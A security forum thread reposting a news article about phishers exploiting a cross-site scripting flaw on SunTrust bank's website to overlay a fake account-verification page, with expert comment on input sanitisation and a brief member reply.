Previous Thread
Next Thread
Print Thread
Rate Thread
Joined: Nov 2002
Posts: 1,146
Likes: 1
Ice Offline OP
UGN News Staff
OP Offline
UGN News Staff
Joined: Nov 2002
Posts: 1,146
Likes: 1
raudsters have used a clever web-programming trick to turn a legitimate banking site into a tool for stealing account information.

Suntrust, a bank based in Georgia, US, has fallen foul of the deception, according to web security experts who received emails designed to swindle customers.

Researchers at UK-based web-monitoring firm Netcraft received emails claiming to come from Suntrust that ask customers to verify their account information using a link embedded in the message.

But the email was not sent from the bank's own servers and the web page it linked to contained extra characters in the URL address line - added on to the bank�s legitimate web address. So, while the page was hosted by the bank�s servers, hackers had overlaid it with altered elements to give the appearance of a legitimate �Account Verification� page.

Decoding these altered elements revealed a link to an alternative server controlled by the hackers. Customers entering their account information onto the overlaid page were inadvertently sending their details to be recorded by the hackers� web server.


Pass it on

Netcraft engineer Paul Mutton says the "phishing" trick is made worse because it exploits the bank�s own site. "As far as the user is concerned, they are visiting a legitimate site," he says.

Known as a "cross-site scripting vulnerability" the trick allows an outsider to add to and alter a real web page with their own text and links. The problem can be exploited when the code used by the website operator - to process information for their web page - has not been written specifically to exclude outside, or untrusted, data.

"If you're web programming, you should really make sure data [entered in a URL] is sanitised," Mutton adds.

Since being informed by Netcraft, Suntrust has modified its site to prevent the trick working. Following a link from one of the phishing emails now produces a genuine web page.

Experts had previously warned that many sites could be vulnerable to cross-site scripting. A report released in September 2004 by UK computer security firm Next Generation Security (NGS) suggested that as many as nine out of 10 bank websites could be open to this type of flaw.

Source: News Scientist


Good artists copy, great artists
steal.

-Picasso
Joined: Feb 2002
Posts: 7,203
Likes: 11
Community Owner
Offline
Community Owner
Joined: Feb 2002
Posts: 7,203
Likes: 11
I've been getting these emails for years... It's sad though as I don't bank with them lol...


Donate to UGN Security here.
UGN Security, Back of the Web, and VNC Web Services Owner

Link Copied to Clipboard
Member Spotlight
Posts: 30
Joined: June 2002
Forum Statistics
Forums41
Topics33,840
Posts68,858
Average Daily Posts1
Members2,176
Most Online3,253
Jan 13th, 2020
Latest Postings
Where and how do you torrent?
by danni75 - 03/01/24 05:58 AM
Animation,
by JohanKaariainen - 08/15/19 01:18 AM
Blackbeard.....
by Gremelin - 10/03/18 07:02 PM
my old account still exists!
by Crime - 08/10/18 02:47 PM
Okay WTF?
by HenryMiring - 09/27/17 01:45 AM
The History Thread...
by Gremelin - 08/11/17 12:11 PM
My friend NEEDS your HELP!
by Lena01 - 07/21/17 12:06 AM
I'm having fun with this guy.
by gabithompson730 - 07/20/17 01:50 AM
I want to upgrade my phone
by gabithompson730 - 07/20/17 01:49 AM
Doom 3
by Cyrez - 09/11/14 08:58 PM
Amazon Gift Card Generator/KeyGen?te
by Gecko666 - 08/22/14 09:21 AM
AIM scene 99-03
by lavos - 09/02/13 08:06 AM
Planetside 2
by Crime - 03/04/13 07:10 AM
Beta Testers Wanted
by Crime - 03/04/13 06:55 AM
Hello Everyone
by Gremelin - 02/12/12 06:01 PM
Tracfone ESN Generator
by Zanvin Green - 01/18/12 01:31 PM
Python 3 issue
by Testing - 12/17/11 09:28 PM
tracfone airtime
by Drache86 - 07/30/11 03:37 AM
Backdoors and the Infinite
by ZeroCoolStar - 07/10/11 03:52 AM
HackThisZIne #12 Releaseed!
by Pipat2 - 04/28/11 09:20 PM
gang wars? l33t-wars?
by Gremelin - 04/28/11 05:56 AM
Consolidate Forums
by diggin2deep - 04/21/11 10:02 AM
LAN Hacking Noob
by Gremelin - 03/12/11 12:42 AM
Top Posters
UGN Security 41,392
Gremelin 7,203
§intå× 3,255
SilentRage 1,273
Ice 1,146
pergesu 1,136
Infinite 1,041
jonconley 955
Girlie 908
unreal 860
Top Likes Received
Ghost 2
Crime 1
Ice 1
Dartur 1
Cyrez 1
Powered by UBB.threads™ PHP Forum Software 7.7.5